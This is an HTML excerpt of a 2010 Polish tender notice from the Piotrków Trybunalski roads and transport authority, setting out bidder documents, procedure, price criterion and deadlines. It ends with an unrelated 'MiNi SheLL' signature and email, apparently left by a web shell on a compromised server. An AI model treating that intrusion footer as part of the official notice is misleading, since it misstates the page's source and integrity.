<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Formularz oferty wraz z kosztorysem oferty według wzoru zawartego w specyfikacji istotnych warunków zamówienia - wg załącznika nr 1; 
2.Stosowne pełnomocnictwo(a) - w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru albo zaświadczenia o wpisie do ewidencji działalności gospodarczej (należy załączyć oryginał lub kserokopię potwierdzoną przez notariusza);
3.W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument ustanawiający pełnomocnika do reprezentowania ich w postępowaniu        o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy      w sprawie niniejszego zamówienia publicznego (należy załączyć oryginał lub kserokopię potwierdzoną przez notariusza);
4.Oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu, sporządzone na podstawie wzoru stanowiącego - wg załącznika nr 5;
5.Oświadczenie o niepodleganiu wykluczeniu z postępowania na podstawie art. 24 ust 1 oraz ust 2 ustawy Pzp -  wg załącznika nr 2;</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana postanowień umowy może nastąpić za zgodą obu stron wyrażoną na piśmie, 
w formie aneksu do umowy, pod rygorem nieważności takiej zmiany. Zmiany umowy nie mogą naruszać postanowień zawartych w art. 144 ust.1 Prawa zamówień publicznych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mzdik.piotrkow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> MIEJSKI ZARZĄD DRÓG I KOMUNIKACJI
Adres: UL. BELZACKA 176
97-300 PIOTRKÓW TRYBUNALSKI
pok. nr 15.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.10.2010 godzina 07:30, miejsce: MIEJSKI ZARZĄD DRÓG I KOMUNIKACJI
Adres: UL. BELZACKA 176
97-300 PIOTRKÓW TRYBUNALSKI
pok. nr 2.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com